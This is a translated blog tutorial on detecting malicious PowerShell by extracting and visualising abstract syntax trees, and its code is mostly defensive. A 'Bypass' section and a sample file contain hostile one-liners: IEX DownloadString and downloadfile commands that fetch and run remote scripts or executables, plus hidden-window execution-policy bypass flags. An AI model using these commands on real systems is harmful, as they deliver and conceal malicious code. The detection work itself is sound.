[System Security] 43. PowerShell Malicious Code Detection Series (5): Automatic Extraction of the Abstract Syntax Tree Explained


A brief commemoration: my CSDN blog is about to pass 10 million reads, with nearly 300,000 followers across all platforms. Ten years and nearly 700 articles; this really is my youth, from age 20 to 30. The blog holds both technical posts and the stories of the Nazhangluo family. It has recorded our love story and has witnessed a student shaped since childhood by the mountains of Guizhou slowly grow up, and through it I have met many bloggers. Mr. Su, shown in Figure 7, went through many setbacks, earned his Ph.D., and returned to his hometown of Yulin to teach at a university. Today he has built a chemistry laboratory at his own expense, simply to pass on what he has learned to his students. Over these ten years I have met many such bloggers, teachers, and experts on CSDN. We have never met in person and we are scattered around the world, yet we encourage each other.

Finally, my thanks to CSDN, from which I have scored quite a few gifts over the years, and to every reader who has read Nazhang's story or liked my technical blog. I hope everyone will remember a sharer named Eastmount. He is not an expert or a big name, just someone who quietly writes a technical blog because he loves it (this year has been too busy, so I have written very little). I will keep writing on CSDN for 20 years, 30 years, a lifetime, and I will keep recording our family's story. I really want to continue those stories, but I am too busy now, so I will write more after graduation.

I really want to graduate as soon as possible and return to my hometown in Guizhou to teach again. There are so many blog posts to share, so many courses to give, so much open source code to publish, and so much knowledge still to learn. I look forward to the day I stand at the podium again. I am casually taking part in this event; for my story with CSDN, "as long as life goes on, the writing will not stop", see the following article. I am too busy for more than a few words here, and in the next decade we will review the story of these 20 years in detail. I will keep my head down and study, a novice but a diligent one. I am grateful to have met you all, and I will keep working hard. Good night, Na!

You may have seen a similar article of mine before, so why repeat it? I want to help beginners understand virus reverse analysis and system security in a more systematic way, without disturbing the earlier series. I therefore opened this new column to organize and study system security, reverse analysis, and malicious code detection in depth. The "System Security" series will be more focused, more systematic, and more in-depth, and it is also a record of the author's slow growth. Changing majors is hard, and reverse analysis is a tough nut to crack, but I will give it a try and see how much I can learn in the next four years. Enjoy the process, and let's keep going together~

The previous article briefly introduced PowerShell, summarized PowerShell malicious code detection, and covered abstract syntax tree (AST) extraction, mainly from the perspective of published papers. This article describes the AST extraction method in detail. It is implemented through the officially provided interface and covers AST visualization and node extraction. I hope this article is helpful to you, and I recommend reading the papers as well.


I hope these basic principles help everyone do a better job of defense and protection. This is a basic article. As a novice in network security, the author shares some basic self-study tutorials, mostly in the form of online notes, and I hope you like them. I also hope we can learn and make progress together. In the future I will keep studying network security and system security and share the related experiments. In short, I hope this series is helpful to readers. Writing articles is not easy, so if you don't like it, please be kind. Thank you! If the article helps you, that is my biggest motivation to keep writing. You are welcome to like, comment, or message me privately. Let's keep going!

Author’s github resources:

In July 2019 I moved into an unfamiliar major: cyberspace security. Entering the security field for the first time was painful and uncomfortable. There is too much to learn and it touches too many areas, but by sharing 100 articles in the "Self-learning of Network Security" series I have struggled forward. I am grateful to the security experts and friends I have met and come to know this year. Where the writing is poor or incomplete, please bear with me.
Next I am starting a new security series called "System Security", again 100 free articles. It will go deeper into malicious sample analysis, reverse analysis, intranet penetration, network attack and defense practice, and more, shared in the form of notes and hands-on exercises. I hope to make progress together with you. Let's keep going~

Previous analysis:

Statement: I firmly oppose using what is taught here to commit crimes. All crimes will be severely punished. A clean network needs all of us to maintain it, and I recommend that everyone understand the principles behind these techniques in order to defend against them better.

1. Overview of PowerShell

1. High threat

In recent years, PowerShell has been widely used in APT attacks because it is easy to use and easy to conceal. Traditional malicious code detection techniques based on manual feature extraction and machine learning are finding it increasingly difficult to detect malicious PowerShell code effectively.

Microsoft’s PowerShell is a command-line shell and scripting language that is installed by default on Windows machines. It is based on Microsoft’s .NET Framework and includes an interface that allows programmers to access operating system services. While administrators can configure PowerShell to restrict access and reduce vulnerabilities, these restrictions can be bypassed. Additionally, PowerShell commands can easily be dynamically generated, executed from memory, encoded, and obfuscated, making logging and forensic analysis of PowerShell-executed code challenging.

For these reasons, PowerShell is increasingly used by cybercriminals as part of their attack toolchain, primarily for downloading malicious content and for lateral movement. In fact, a recent comprehensive technical report by Symantec on PowerShell abuse by cybercriminals reported a dramatic increase in the number of malicious PowerShell samples they received and the number of penetration tools and frameworks using PowerShell. This highlights the urgent need to develop effective methods for detecting malicious PowerShell commands.

2. Basic syntax

PowerShell is also a component of penetration testing that cannot be ignored, and it is still being actively developed. It is flexible and can manage a Windows system through its full feature set. Once an attacker can run code on a computer, they can download a PowerShell script file (.ps1) to disk and execute it, or run it directly in memory without writing anything to disk.

These features make PowerShell the attacker’s preferred attack method when gaining and maintaining access rights to the system. Using many features of PowerShell, attackers can continue to attack without being easily discovered. Commonly used PowerShell attack tools are as follows.

  • PowerSploit
    This is a widely used PowerShell post-exploitation framework among many PowerShell attack tools, and is often used for information detection, privilege escalation, credential theft, persistence and other operations.
  • Nishang
    A PowerShell-based penetration testing tool that integrates frameworks, scripts and various payloads, including scripts such as download and execution, keylogging, DNS, and delayed commands.
  • Empire
    A PowerShell-based remote control trojan that can export and track credential information from the credential database. It provides integrated modules for early-stage exploitation, information gathering, credential theft, and persistent control.
  • PowerCat
    The PowerShell version of NetCat, known as the “Swiss Army Knife” of networking tools, can read and write data over the network via TCP and UDP. By combining and redirecting with other tools, readers can use it in a variety of ways in scripts.

In PowerShell, the counterparts of cmd commands are called "cmdlets", and their naming is quite consistent. They all take the form "verb-noun", such as New-Item, where the verb is typically Add, New, Get, Remove, Set, and so on. Built-in aliases are generally compatible with Windows Command and Linux shell names. For example, Get-ChildItem can also be invoked as dir or ls. PowerShell commands are not case-sensitive.
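The naming convention and aliases described above can be checked from any PowerShell prompt. The following is a minimal sketch using only the built-in Get-Alias and Get-Command cmdlets; the variable name $contentCmdlets is just for illustration, and the exact set of aliases returned depends on the platform and PowerShell version.

```powershell
# List the aliases that resolve to Get-ChildItem (the set varies by platform).
Get-Alias -Definition Get-ChildItem | ForEach-Object { $_.Name }

# List the cmdlets that share the noun "Content", which shows the verb-noun pattern.
$contentCmdlets = Get-Command -Noun Content -CommandType Cmdlet |
    ForEach-Object { $_.Name }
$contentCmdlets

# Command names are case-insensitive: both lookups resolve to the same cmdlet.
(Get-Command get-content).Name -eq (Get-Command GET-CONTENT).Name
```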

The following uses file operations as an example to explain the basic usage of PowerShell commands.

  • New directory: New-Item whitecellclub -ItemType Directory
  • New file: New-Item light.txt -ItemType File
  • Remove directory: Remove-Item whitecellclub
  • Display file content: Get-Content test.txt
  • Set file content: Set-Content test.txt -Value "hello, world!"
  • Append content: Add-Content light.txt -Value "i love you"
  • Clear content: Clear-Content test.txt

Take a simple example:

New-Item test -ItemType directory
Remove-Item test

Get-Content eastmount.txt
Add-Content eastmount.txt -Value " bye!"
Get-Content eastmount.txt 

Set-Content eastmount.txt -Value "haha"
Get-Content eastmount.txt
Clear-Content eastmount.txt
Get-Content eastmount.txt
Remove-Item eastmount.txt
Get-Content eastmount.txt

3. Bypass

In testing, a PowerShell script downloaded and executed from a cmd window ran regardless of the current execution policy. Running a script file in a PowerShell window, by contrast, requires changing the Restricted policy to Unrestricted with administrator privileges, so during penetration testing some method is needed to bypass the policy and execute the script.

(1) Download a remote PowerShell script to bypass the execution policy
Call the DownloadString function to download the remote ps1 script file.

// Run the following command in a cmd window
powershell -c IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.10.11/test.ps1')

// Run the following command in a PowerShell window
IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.10.11/test.ps1')

The figure below, taken from Mr. Xie's article, shows the command being run after switching to a CMD window.

(2) Execution by bypassing local permissions
Upload xxx.ps1 to the target server, and in the CMD environment, execute the script locally on the target server, as shown below.

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

powershell -exec bypass  .\test.ps1

(3) Locally hide and bypass permissions to execute scripts

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -File xxx.ps1

For example:

  • powershell.exe -exec bypass -W hidden -nop test.ps1

(4) Use IEX to download a remote PS1 script and bypass the execution policy

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -NonI IEX(New-Object Net.WebClient).DownloadString("xxx.ps1");[Parameters]

Function definition:

function Test-MrParameter {

    param (
        [string]$ComputerName
    )

    Write-Output $ComputerName
    Write-Output ($ComputerName+$ComputerName)
    Write-Output ($ComputerName+$ComputerName+$ComputerName)
}

View and use functions:

Get-Command -Name Test-MrParameter -Syntax
Test-MrParameter -ComputerName 'this is a computer name'
pause

Output result:

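Test-MrParameter [[-ComputerName] <string>]

this is a computer name
this is a computer namethis is a computer name
this is a computer namethis is a computer namethis is a computer name
Press Enter to continue...: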

2. powershell.one

The abstract syntax tree of PowerShell is used as a semantic representation of the code. It expresses the logical structure of a script's functionality as a multi-way tree, keeps the contextual features of the code, and removes the interference of irrelevant parameters, which makes it an effective basis for analyzing PowerShell code with similar functionality. A common approach is either to use an existing interface or to write a custom extraction program. One approach was introduced in the previous article; this article covers the officially provided interface.

PowerShell provides a built-in interface for accessing a script's AST, and the AST structure obtained through that interface is shown in the figure.

The Abstract Syntax Tree (AST) groups tokens into meaningful structures and is the most sophisticated way of analyzing PowerShell code.

1. Concept

The PowerShell parser converts single characters into meaningful keywords and differentiates, for example, commands, parameters, and variables, which is called tokenization, and was described earlier. For example, editors use these markers to color code and display variables in a different color than commands.

The parser doesn’t stop there. In order for PowerShell to execute code, it needs to know how the individual tokens form an executable structure. The parser takes the tokens and builds an abstract syntax tree (AST), which basically groups the tokens into meaningful structures.

An abstract syntax tree is called a tree because it works like a hierarchical tree. PowerShell starts with the first token and then takes the PowerShell language definition (syntax) to see what the next possible token might be. This way, the parser works through the code.

  • Case 1: PowerShell succeeds and creates a valid structure for the code
  • Case 2: PowerShell encounters a syntax error and reports it
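Both cases can be observed directly by calling the parser. The following is a minimal sketch using the static ParseInput method of System.Management.Automation.Language.Parser; the sample strings and the variable names ($parser, $brokenErrors, and so on) are chosen here for illustration only.

```powershell
$parser = [System.Management.Automation.Language.Parser]

# Case 1: valid code. ParseInput fills $tokens and returns the root of the AST.
$tokens = $null
$parseErrors = $null
$ast = $parser::ParseInput('Get-ChildItem -Path $home', [ref]$tokens, [ref]$parseErrors)
$tokens | ForEach-Object { '{0,-12} {1}' -f $_.Kind, $_.Text }
'Root node type: {0}' -f $ast.GetType().Name
'Syntax errors : {0}' -f $parseErrors.Count

# Case 2: the closing parenthesis of the condition is missing,
# so the parser reports at least one syntax error instead of failing silently.
$brokenTokens = $null
$brokenErrors = $null
$null = $parser::ParseInput('if ($a -eq 1 { "x" }', [ref]$brokenTokens, [ref]$brokenErrors)
$brokenErrors | ForEach-Object { $_.Message }
```

The token list is what an editor would use for syntax coloring, while the returned AST object is the structure discussed in the rest of this article.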

2. Access AST

Starting with PowerShell 3, the Abstract Syntax Tree is exposed to you, so you can now also analyze PowerShell code and understand its internals. There are two main ways to access the AST:

  • ScriptBlock (code block): A scriptblock is a valid PowerShell code block, so it has already been processed by the parser, and the parser guarantees that there are no syntax errors in the code. Each scriptblock has a property called Ast that exposes the abstract syntax tree of the code contained in the scriptblock.
  • Parser: You can ask the PowerShell parser to parse arbitrary code and return a token and AST. When you enter and execute code, you’re basically mimicking what PowerShell does. Because the parser deals with raw text, there is no guarantee that the code is syntactically correct. That’s why the parser also returns any syntax errors it finds.

A simple example of viewing the AST is shown below: define a scriptblock, run it, and then inspect the Abstract Syntax Tree (AST) that the parser built for it.

$code = { "Hello" * 10 }
$code.Invoke()
$code.Ast

The output is shown in the following figure:

This can be used to create a simple test function that checks whether a string is valid PowerShell code:

function Test-PowerShellCode
{
    param
    (
        [string]
        $Code
    )

    try
    {
        # try and convert string to scriptblock:
        $null = [ScriptBlock]::Create($Code)
    }
    catch
    {
        # the parser is invoked implicitly and returns
        # syntax errors as exceptions:
        $_.Exception.InnerException.Errors
    }
}

An Abstract Syntax Tree (AST) is a tree of Ast objects. The top of this tree is what the parser returns to you. Any Ast object encountered while traversing the abstract syntax tree has Parent and Extent properties. Parent defines the tree relationship and Extent defines the PowerShell code covered by the Ast object.
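To make the Parent and Extent properties concrete, the sketch below parses the one-line script `$a = 1`, locates the innermost node for the literal, and walks upward through Parent until the root is reached. The variable names ($root, $chain) are illustrative, and ParseInput is used instead of a scriptblock literal so that the root node's Parent is $null and the walk terminates at the script itself.

```powershell
$tokens = $null
$parseErrors = $null
$root = [System.Management.Automation.Language.Parser]::ParseInput('$a = 1', [ref]$tokens, [ref]$parseErrors)

# Find the innermost node that represents the literal 1.
$node = $root.Find({
    param($ast)
    $ast -is [System.Management.Automation.Language.ConstantExpressionAst]
}, $true)

# Walk up the tree via Parent; Extent.Text is the source code each node covers.
$chain = [System.Collections.ArrayList]@()
while ($null -ne $node) {
    $null = $chain.Add($node.GetType().Name)
    '{0,-24} covers: {1}' -f $node.GetType().Name, $node.Extent.Text
    $node = $node.Parent
}
```

Each step up the chain covers the same or a larger piece of source text, which is exactly the nesting that the visualization in the next section prints with indentation.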

Common methods are as follows:

Name                   Signature
----                   ---------
Copy                   System.Management.Automation.Language.Ast Copy()
Find                   System.Management.Automation.Language.Ast Find(System.Func[System.Management.Automation.Language.Ast,bool] predicate, bool searchNestedScriptBlocks)
FindAll                System.Collections.Generic.IEnumerable[System.Management.Automation.Language.Ast] FindAll(System.Func[System.Management.Automation.Language.Ast,bool] predicate, b...
Visit                  System.Object Visit(System.Management.Automation.Language.ICustomAstVisitor astVisitor), void Visit(System.Management.Automation.Language.AstVisitor astVisitor)
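As a short illustration of Find and FindAll from the table above, the following sketch collects every command invoked in a scriptblock and the first variable it uses. The sample scriptblock and the variable names are made up for this example; the predicate is an ordinary scriptblock that PowerShell converts to the required delegate, and the second argument ($true) asks the search to descend into nested scriptblocks.

```powershell
$code = { $files = Get-ChildItem; $files | Where-Object Length -gt 1kb; Write-Output 'done' }

# FindAll returns every node for which the predicate is true.
$commandAsts = $code.Ast.FindAll({
    param($ast)
    $ast -is [System.Management.Automation.Language.CommandAst]
}, $true)
$commandNames = @($commandAsts | ForEach-Object { $_.GetCommandName() })
$commandNames

# Find returns only the first matching node.
$firstVariable = $code.Ast.Find({
    param($ast)
    $ast -is [System.Management.Automation.Language.VariableExpressionAst]
}, $true)
'First variable: {0}' -f $firstVariable.Extent.Text
```

Filtering by node type in this way is often simpler than walking the whole tree when only one kind of node is of interest.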

3. Abstract Syntax Tree Visualization

1. Official example

It may be helpful to add the Ast object relationships to the output, and visualize the tree, and how the objects are nested. That’s why I created Convert-CodeToAst that takes any simple (or complex) PowerShell code (scriptblock) and outputs the object hierarchy and involved types:

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]
    [ScriptBlock]
    $Code
  )


  # build a hashtable for parents
  $hierarchy = @{}

  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = $_.Parent.GetHashCode()
    if ($hierarchy.ContainsKey($id) -eq $false)
    {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent

  }

  # visualize tree recursively
  function Visualize-Tree($Id, $Indent = 0)
  {
    # use this as indent per level:
    $space = '--' * $indent
    $hierarchy[$id] | ForEach-Object {
      # output current ast object with appropriate
      # indentation:
      '{0}[{1}]: {2}' -f $space, $_.GetType().Name, $_.Extent

      # take id of current ast object
      $newid = $_.GetHashCode()
      # recursively look at its children (if any):
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid -indent ($indent + 1)
      }
    }
  }

  # start visualization with ast root object:
  Visualize-Tree -id $code.Ast.GetHashCode()
}

Call it like this:

Convert-CodeToAst -Code {
  # place your test code here (make it as simple as you can):
  $a = 1
}

operation result:

[NamedBlockAst]: $a = 1
--[AssignmentStatementAst]: $a = 1
----[VariableExpressionAst]: $a
----[CommandExpressionAst]: 1
------[ConstantExpressionAst]: 1

Function code analysis:

If a message says that running scripts is disabled on this system, as shown in the following figure:

A simple setting is required.

  • Set-ExecutionPolicy RemoteSigned
    Allows local scripts to run; scripts downloaded from the internet must be signed

It is also recommended that you edit PowerShell code in VS Code.

2. AST extraction of code blocks

The code for abstract syntax tree extraction is given below. The code is relatively simple, and you can learn it directly.

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]    # Mandatory parameter
    [ScriptBlock]
    $Code
  )

  # build a hashtable for parents
  $hierarchy = @{}

  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = $_.Parent.GetHashCode()
    if ($hierarchy.ContainsKey($id) -eq $false)
    {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent

  }

  # visualize tree recursively
  function Visualize-Tree($Id, $Indent = 0)
  {
    # use this as indent per level:
    $space = '--' * $indent
    $hierarchy[$id] | ForEach-Object {
      # output current ast object with appropriate
      # indentation:
      '{0}[{1}]: {2}' -f $space, $_.GetType().Name, $_.Extent

      # take id of current ast object
      $newid = $_.GetHashCode()
      # recursively look at its children (if any):
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid -indent ($indent + 1)
      }
    }
  }

  # start visualization with ast root object:
  Visualize-Tree -id $code.Ast.GetHashCode()
}

Convert-CodeToAst -Code {$a=1}

The running result is shown in the following figure:

3. AST extraction of a specified PS file

Directly give the extraction code of the specified PS script file.

The complete code and detailed comments are as follows:

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]    # Mandatory parameter 
    [System.String]$str       # Execute ps file name
  )

  # build hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # Read the contents of the ps file (-Raw keeps it as one multi-line string)
  Write-Output ( "file name: {0}" -f ($str))
  $content = Get-Content $str -Raw
  Write-Output $content

  # Create the script block
  $code = [ScriptBlock]::Create($content)

  # extract AST
  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }

  # recursively visualize the tree
  function Visualize-Tree($Id, $Indent = 0)
  {
    # indent per level
    $space = '--' * $indent
    $hierarchy[$id] | ForEach-Object {
      # output the AST object
      '{0}[{1}]: {2}' -f $space, $_.GetType().Name, $_.Extent

      # get the id of the current AST object
      $newid = $_.GetHashCode()
      # recurse into its children (if any)
      if ($hierarchy.ContainsKey($newid)) {
        Visualize-Tree -id $newid -indent ($indent + 1)
      }
    }
  }

  # Start the visualization using the AST root object
  Visualize-Tree -id $code.Ast.GetHashCode()
  return $result
}

Convert-CodeToAst -str .\data\example-001.ps1

At this point the output is as shown below:

Assume the "example-002.ps1" file exists with the following content.

powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');

The corresponding AST is as follows:

PS D:\powershell> .\get_ast_002.ps1
file name: .\data\example-002.ps1
powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');
[NamedBlockAst]: powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
--[PipelineAst]: powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
----[CommandAst]: powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
------[StringConstantExpressionAst]: powershell
------[InvokeMemberExpressionAst]: (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe')
--------[ParenExpressionAst]: (new-object system.net.webclient)
----------[PipelineAst]: new-object system.net.webclient
------------[CommandAst]: new-object system.net.webclient
--------------[StringConstantExpressionAst]: new-object
--------------[StringConstantExpressionAst]: system.net.webclient
--------[StringConstantExpressionAst]: downloadfile
--------[StringConstantExpressionAst]: 'http://192.168.10.11/test.exe'
--------[StringConstantExpressionAst]: 'test.exe'
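Once the tree is available, individual node types can be queried for detection purposes. The sketch below is one possible illustration, not a complete detector: it parses the same one-line sample and looks for InvokeMemberExpressionAst nodes whose member name appears in a small list. The list in $suspiciousMembers and all variable names are assumptions made for this example.

```powershell
$source = "powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');"

$tokens = $null
$parseErrors = $null
$ast = [System.Management.Automation.Language.Parser]::ParseInput($source, [ref]$tokens, [ref]$parseErrors)

# Assumption: an illustrative list of method names worth flagging.
$suspiciousMembers = 'downloadfile', 'downloadstring'

# Match method calls whose name is a plain string constant found in the list.
# -contains compares case-insensitively, so DownloadFile and downloadfile both match.
$hits = @($ast.FindAll({
    param($node)
    $node -is [System.Management.Automation.Language.InvokeMemberExpressionAst] -and
    $node.Member -is [System.Management.Automation.Language.StringConstantExpressionAst] -and
    $suspiciousMembers -contains $node.Member.Value
}, $true))

$hits | ForEach-Object { 'Method call "{0}": {1}' -f $_.Member.Value, $_.Extent.Text }
```

Because the match is made on the parsed member name rather than on the raw text, differences in letter case or whitespace in the script do not affect it. Obfuscation that builds the method name at run time would still evade a check this simple.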

So, if I just want to extract nodes, how to achieve it?

4. Abstract Syntax Tree Node Extraction

1. Extract AST nodes

Use post-order traversal to extract AST nodes. The specific code is as follows:

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]    # Mandatory parameter 
    [System.String]$str       # Execute ps file name
  )

  # build hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # Read the contents of the ps file (-Raw keeps it as one multi-line string)
  Write-Output ( "file name: {0}" -f ($str))
  $content = Get-Content $str -Raw
  Write-Output $content

  # Create the script block from the file contents, not from the file name
  $code = [ScriptBlock]::Create($content)

  # extract AST
  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }

  # Collect node type names in post-order
  function Visualize-Tree($Id)
  {
    $hierarchy[$id] | ForEach-Object {
      # Get the id of the current AST object
      $newid = $_.GetHashCode()

      # Visit its children first (if any)
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid
      }
      # Then record the node itself (post-order)
      $null = $result.Add($_.GetType().Name)
    }
  }

  # Start at the children of the AST root object, so the output ends with NamedBlockAst
  Visualize-Tree -id $code.Ast.GetHashCode()
  return $result
}

Convert-CodeToAst -str .\data\example-002.ps1

The output of the “$a=1” example is shown below:

The post-order node output for another piece of PowerShell code is shown below:

powershell (new-object system.net.webclient).downloadfile('http://192.168.10.11/test.exe','test.exe');
StringConstantExpressionAst
StringConstantExpressionAst
StringConstantExpressionAst
CommandAst
PipelineAst
ParenExpressionAst
StringConstantExpressionAst
StringConstantExpressionAst
StringConstantExpressionAst
InvokeMemberExpressionAst
CommandAst
PipelineAst
NamedBlockAst
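The traversal order is easier to check on the small `$a = 1` example. The following is a compact sketch of the same idea: nodes are grouped under their parent and a node is recorded only after all of its children. Get-AstPostOrder and Visit are hypothetical names introduced here, the function takes source text rather than a file name, and, unlike the listing above, it includes the root ScriptBlockAst as the final entry.

```powershell
function Get-AstPostOrder {
    param([Parameter(Mandatory)][string]$Source)

    $tokens = $null
    $parseErrors = $null
    $root = [System.Management.Automation.Language.Parser]::ParseInput($Source, [ref]$tokens, [ref]$parseErrors)

    # Group every node under the hash code of its parent (same keying as the article's code).
    $children = @{}
    foreach ($node in $root.FindAll({ $true }, $true)) {
        if ($null -eq $node.Parent) { continue }   # the root has no parent
        $key = $node.Parent.GetHashCode()
        if (-not $children.ContainsKey($key)) {
            $children[$key] = [System.Collections.ArrayList]@()
        }
        $null = $children[$key].Add($node)
    }

    # Post-order: visit all children first, then record the node itself.
    $names = [System.Collections.ArrayList]@()
    function Visit($Node) {
        $key = $Node.GetHashCode()
        if ($children.ContainsKey($key)) {
            foreach ($child in $children[$key]) { Visit $child }
        }
        $null = $names.Add($Node.GetType().Name)
    }
    Visit $root
    return $names.ToArray()
}

$order = @(Get-AstPostOrder -Source '$a = 1')
$order -join ' '
```

For `$a = 1` the leaves (the variable and the constant) come first and the enclosing blocks come last, mirroring the indented tree shown in the visualization section read from the deepest level outward.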

2. AST node splicing

Finally, add the add_blanks function, which joins the node names into one space-separated string so that the result can be stored in a local CSV or TXT file. The complete code looks like this:

# Function: concatenate AST node names
function add_blanks {
  param (
    [Parameter(Mandatory=$true)]
    [System.Array]$arr
  )
  $strNode = ''
  foreach ($elem in $arr) {
    if ($strNode.Length -ne 0) {   # -ne: not equal to
      $elem = " " + $elem
    }
    $strNode = $strNode + $elem
  }
  return $strNode
}

# Function: extract the abstract syntax tree (AST) of PowerShell code
function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]    # Mandatory parameter 
    [System.String]$str       # Execute ps file name
  )

  # build hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # Read the contents of the ps file (-Raw keeps it as one multi-line string)
  Write-Output ( "file name: {0}" -f ($str))
  $content = Get-Content $str -Raw
  Write-Output $content

  # Create the script block
  $code = [ScriptBlock]::Create($content)

  # extract AST
  $code.Ast.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }

  # Collect node type names in post-order
  function Visualize-Tree($Id)
  {
    $hierarchy[$id] | ForEach-Object {
      # Get the id of the current AST object
      $newid = $_.GetHashCode()

      # Visit its children first (if any)
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid
      }
      # Then record the node itself (post-order)
      $null = $result.Add($_.GetType().Name)
    }
  }

  # Start the visualization using the AST root object
  Visualize-Tree -id $code.Ast.GetHashCode()

  # Join the collected node type names into one space-separated string
  $strNode = add_blanks -arr $result
  return $strNode
}

# Read a single PS file
# Convert-CodeToAst -str .\data\example-002.ps1

# Batch mode: the Read_csv_powershell function is not shown in this article
# Note: $input is an automatic variable, so the paths use other names
$inputCSV = '.\data\data.csv'
$outputCSV = '.\data\data_AST.csv'
Read_csv_powershell -inputfile $inputCSV -outputfile $outputCSV

The results of the operation are shown in the figure below, including saving to the “data_ast.csv” file.

5. ParseInput replaces Create

When the code above is used to parse real PS files, it often reports an error like the following. I checked many sources without finding a fix at first.

  • Unexpected token in expression or statement
  • CategoryInfo : NotSpecified: (:) [], MethodInvocationException

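The solution I finally found: [ScriptBlock]::Create parses the PowerShell code first and refuses to create the code block if it contains any syntax error. The alternative is to call the parser directly through ParseInput, which returns the AST together with any syntax errors instead of throwing an exception. The reference and the call are: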

  • https://stackoverflow.com/questions/39909021/parsing-powershell-script-with-ast

$code = [Management.Automation.Language.Parser]::ParseInput($content, [ref]$tokens, [ref]$errors)
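The difference between the two calls can be seen on a deliberately broken snippet. This is a minimal sketch; the sample string and the variable names ($broken, $createFailed, $nodeCount) are chosen here for illustration.

```powershell
# An incomplete expression: the closing parenthesis is missing.
$broken = 'Write-Output (1 + '

# [ScriptBlock]::Create throws when the code has a syntax error.
$createFailed = $false
try {
    $null = [ScriptBlock]::Create($broken)
}
catch {
    $createFailed = $true
}

# ParseInput does not throw: it returns an AST and fills $parseErrors instead.
$tokens = $null
$parseErrors = $null
$ast = [System.Management.Automation.Language.Parser]::ParseInput($broken, [ref]$tokens, [ref]$parseErrors)
$nodeCount = @($ast.FindAll({ $true }, $true)).Count

'Create threw an exception : {0}' -f $createFailed
'ParseInput error count    : {0}' -f $parseErrors.Count
'AST nodes still returned  : {0}' -f $nodeCount
```

For malware analysis this matters because samples are often truncated or partially obfuscated. It is worth checking $parseErrors before trusting the extracted node sequence, since a tree built from erroneous input may be incomplete.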

The complete code is as follows:

function Convert-CodeToAst
{
  param
  (
    [Parameter(Mandatory)]    # Mandatory parameter 
    [System.String]$str       # Execute ps file name
  )

  # build hashtable
  $hierarchy = @{}
  $result = [System.Collections.ArrayList]@()

  # Read the contents of the ps file (-Raw keeps it as one multi-line string)
  Write-Output ( "file name: {0}" -f ($str))
  $content = Get-Content $str -Raw
  Write-Output $content

  # [ScriptBlock]::Create is not used here.
  # Error: expression or statement contains an unexpected token
  # Reason: Create throws unless the PS code is syntactically correct
  # $code = [ScriptBlock]::Create($content)

  $tokens = $null
  $errors = $null
  $code = [Management.Automation.Language.Parser]::ParseInput($content, [ref]$tokens, [ref]$errors)


  Write-Output $code

  # extract AST
  $code.FindAll( { $true }, $true) |
  ForEach-Object {
    # take unique object hash as key
    $id = 0;
    if($_.Parent) {
      $id = $_.Parent.GetHashCode()
    }
    Write-Debug('{0}:{1}' -f $_.GetType().Name,$id)

    if ($hierarchy.ContainsKey($id) -eq $false) {
      $hierarchy[$id] = [System.Collections.ArrayList]@()
    }
    $null = $hierarchy[$id].Add($_)
    # add ast object to parent
  }

  # Collect node type names in post-order
  function Visualize-Tree($Id)
  {
    $hierarchy[$id] | ForEach-Object {
      # Get the id of the current AST object
      $newid = $_.GetHashCode()

      # Visit its children first (if any)
      if ($hierarchy.ContainsKey($newid))
      {
        Visualize-Tree -id $newid
      }
      # Then record the node itself (post-order)
      $null = $result.Add($_.GetType().Name)
    }
  }

  # Start the visualization using the AST root object
  Visualize-Tree -id $code.GetHashCode()
  Write-Output $result
  return $result
}

Convert-CodeToAst -str .\data\beacon

6. Summary

That concludes this article. I hope it helps you.

  • 1. Overview of Powershell
    1. High threat
    2. Basic syntax
    3. Bypass
  • 2. powershell.one
